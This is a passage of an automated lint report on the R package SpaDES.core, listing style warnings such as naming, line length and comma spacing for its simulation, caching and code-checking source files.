 ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 